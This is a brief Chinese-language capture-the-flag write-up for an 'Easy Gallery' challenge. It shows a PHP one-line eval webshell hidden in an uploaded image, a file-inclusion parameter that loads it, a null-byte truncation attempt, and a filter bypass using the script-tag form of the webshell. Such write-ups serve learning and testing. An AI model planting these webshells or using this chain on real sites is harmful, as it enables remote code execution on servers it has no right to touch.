Easy Gallery解题记录
首先进入发现有一个文件上传页面先上传了一张.jpg文件
上传得到一个id
通过view页面可以查看到自己上传的图片,也可以看到图片的保存路径
多半是考文件包含
写入一句话木马<?php @eval($_GET['pass']);?>
发现?page可以插入payload:?page=./uploads/1581496316.jpg
./是当前目录,即http://127.0.0.1:83012/
但是自动在文件后面加上.php后缀,在url中用%00进行截断
不行,去网上搜了下,可能是对一句话进行了正则,过滤了
改用<script language="php">@eval($_GET['pass'])</script>
搞定。
<script></script>格式写一句话很常见,之前题目也遇到过,但还是没想到是对一句话木马进行过滤